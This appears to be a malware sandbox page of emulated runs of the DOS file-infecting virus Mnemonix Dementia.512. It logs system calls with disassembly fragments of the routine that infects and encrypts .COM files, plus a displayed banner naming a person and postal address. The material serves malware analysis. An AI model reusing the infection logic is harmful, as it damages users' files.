Sample viewer

vx.netlux.org/Virus.DOS.Mnemonix.Dementia.512

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:27:02.034319561Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3
0x149f5: jne 0x14a01
0x149f7: mov dx, bp
0x149f9: add dx, 0x1fe
0x149fd: mov ah, 0x3b
0x149ff: int 0x21
0x14a01: mov ah, 0x4e
0x14a03: xor cx, cx
0x14a05: mov dx, bp
0x14a07: add dx, 0x201
0x14a0b: int 0x21
0x14a0d: jb 0x14a31
0x14a0f: mov ax, 0
0x14a12: mov es, ax
0x14a14: cmp word ptr es:[3], -1
0x14a1a: je 0x14a29
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a
0x14a25: mov ax, 0xffff
0x14a28: dec word ptr [0xe807]
2018-12-17T22:27:02.037362926Z 78 PC: 14a0d | Find first file
2018-12-17T22:27:02.044336736Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:27:02.051533346Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.059150864Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.060742083Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.063646177Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.065485451Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.068320945Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-17T22:27:02.070862467Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.086465813Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.088259721Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.096592843Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.099369554Z 61 PC: 14a8a | Open file (Filename = 'PRINT.COM')
2018-12-17T22:27:02.107485796Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.114528905Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.116016145Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.119452928Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.120836138Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.126417838Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-17T22:27:02.129562498Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.138355221Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.139896689Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.149162148Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.152428265Z 61 PC: 14a8a | Open file (Filename = 'HELLO.COM')
2018-12-17T22:27:02.160104237Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.168140207Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.169595053Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.172409866Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.175221322Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.178111848Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-17T22:27:02.180694037Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.189937877Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.191748608Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.200477096Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.203600187Z 61 PC: 14a8a | Open file (Filename = 'PHANG.COM')
2018-12-17T22:27:02.2109374Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.217953067Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.219383468Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.224952303Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.226620918Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.229524041Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-17T22:27:02.232905428Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.242515332Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.244655092Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.254408561Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.257277373Z 61 PC: 14a8a | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:27:02.2644668Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.272047375Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.27360355Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.276494528Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.27863691Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.281922197Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-17T22:27:02.284604323Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.294712216Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.296572695Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.305500364Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.309097639Z 61 PC: 14a8a | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:27:02.317086607Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.32412218Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.326281199Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.329119112Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.330581247Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.333981559Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-17T22:27:02.336749199Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.345723343Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.347905316Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.356768048Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.359800435Z 61 PC: 14a8a | Open file (Filename = 'PAH.COM')
2018-12-17T22:27:02.367594969Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.37675011Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.379299839Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.382163164Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.384360717Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.386291273Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-17T22:27:02.389184007Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.399422268Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.401494847Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.410448251Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.41426412Z 61 PC: 14a8a | Open file (Filename = 'TEST.COM')
2018-12-17T22:27:02.422043822Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.425463029Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.428435419Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.436779136Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.439601105Z 9 PC: 12a47 | Display string (String= '')
2018-12-17T22:27:02.442848408Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-17T22:27:02.446508694Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-17T22:27:02.453316379Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-17T22:27:02.459717956Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-17T22:27:02.465917937Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-17T22:27:02.472581098Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-17T22:27:02.478901911Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-17T22:27:02.489164697Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-17T22:27:02.497073427Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-17T22:27:02.50493933Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-17T22:27:02.512577505Z 9 PC: 12a7e | Display string (String= '')
2018-12-17T22:27:02.514766487Z 76 PC: 12a83 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4797,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:55.335599083Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3
0x149f5: jne 0x14a01
0x149f7: mov dx, bp
0x149f9: add dx, 0x1fe
0x149fd: mov ah, 0x3b
0x149ff: int 0x21
0x14a01: mov ah, 0x4e
0x14a03: xor cx, cx
0x14a05: mov dx, bp
0x14a07: add dx, 0x201
0x14a0b: int 0x21
0x14a0d: jb 0x14a31
0x14a0f: mov ax, 0
0x14a12: mov es, ax
0x14a14: cmp word ptr es:[3], -1
0x14a1a: je 0x14a29
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a
0x14a25: mov ax, 0xffff
0x14a28: dec word ptr [0xe807]
2018-12-25T11:52:55.338549685Z 78 PC: 14a0d | Find first file
2018-12-25T11:52:55.346133534Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:55.353746206Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:52:55.361916357Z 66 PC: 14ac3 | Move file pointer
2018-12-25T11:52:55.363773495Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.367032734Z 66 PC: 14ad9 | Move file pointer
2018-12-25T11:52:55.369448922Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.372578737Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-25T11:52:55.375276853Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:52:55.399177171Z 87 PC: 14b39 | Get or set file date and time
2018-12-25T11:52:55.400771427Z 62 PC: 14b3d | Close file
2018-12-25T11:52:55.408720577Z 79 PC: 14a38 | Find next file
2018-12-25T11:52:55.411530263Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.41919886Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.426752846Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.428327085Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.432631224Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.434411607Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.437625669Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.441390902Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.45037564Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.452165887Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.461578986Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.464615051Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.471848345Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.478997449Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.480347777Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.483142584Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.485131369Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.487674384Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.49017472Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.498453717Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.501055857Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.509716949Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.513163732Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.521240136Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.52920058Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.530931151Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.534763015Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.536111291Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.538049369Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.540648498Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.546254582Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.547577664Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.553732195Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.555644626Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.559957267Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.564995798Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.567010525Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.570468309Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.572644748Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.576783099Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.579339704Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.587871517Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.59022849Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.599632923Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.602854298Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.61112901Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.618212059Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.619661865Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.62301054Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.624451463Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.62756769Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.631685587Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.641038716Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.643228902Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.652956191Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.656613492Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.664141224Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.672115015Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.674916536Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.678185438Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.680115263Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.684301427Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.68703871Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.695929279Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.698644898Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.708093268Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.711018054Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.71974202Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.722731642Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.731827896Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.740369645Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.744049099Z 9 PC: 12a47 | Display string (String= '')
2018-12-25T11:52:55.746402949Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-25T11:52:55.75292723Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-25T11:52:55.760618401Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-25T11:52:55.768419275Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-25T11:52:55.775151263Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-25T11:52:55.782715211Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-25T11:52:55.789654883Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-25T11:52:55.800964396Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-25T11:52:55.810109343Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-25T11:52:55.819030221Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-25T11:52:55.826889314Z 9 PC: 12a7e | Display string (String= '')
2018-12-25T11:52:55.830574512Z 76 PC: 12a83 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4797,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:55.532086372Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3
0x149f5: jne 0x14a01
0x149f7: mov dx, bp
0x149f9: add dx, 0x1fe
0x149fd: mov ah, 0x3b
0x149ff: int 0x21
0x14a01: mov ah, 0x4e
0x14a03: xor cx, cx
0x14a05: mov dx, bp
0x14a07: add dx, 0x201
0x14a0b: int 0x21
0x14a0d: jb 0x14a31
0x14a0f: mov ax, 0
0x14a12: mov es, ax
0x14a14: cmp word ptr es:[3], -1
0x14a1a: je 0x14a29
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a
0x14a25: mov ax, 0xffff
0x14a28: dec word ptr [0xe807]
2018-12-25T11:52:55.536187733Z 59 PC: 14a01 | Change current directory
2018-12-25T11:52:55.540176873Z 78 PC: 14a0d | Find first file
2018-12-25T11:52:55.545926272Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:55.558462562Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:52:55.565494886Z 66 PC: 14ac3 | Move file pointer
2018-12-25T11:52:55.566823928Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.570469384Z 66 PC: 14ad9 | Move file pointer
2018-12-25T11:52:55.572518516Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.575428112Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-25T11:52:55.578910922Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:52:55.593982389Z 87 PC: 14b39 | Get or set file date and time
2018-12-25T11:52:55.595340959Z 62 PC: 14b3d | Close file
2018-12-25T11:52:55.601085316Z 79 PC: 14a38 | Find next file
2018-12-25T11:52:55.602921111Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.608627642Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.622729796Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.62449516Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.627392812Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.629458251Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.632248448Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.634553471Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.643129034Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.644471458Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.65239156Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.655497149Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.66185563Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.668097776Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.670338461Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.672879317Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.674483136Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.67758188Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.682940392Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.691535264Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.69326288Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.700941742Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.703824221Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.71162277Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.718060729Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.719332808Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.722925619Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.733608158Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.736218836Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.738782523Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.752419288Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.754136684Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.760774674Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.762896107Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.766937353Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.770901351Z 66 PC: 14ac3 | Move file pointer (See above)
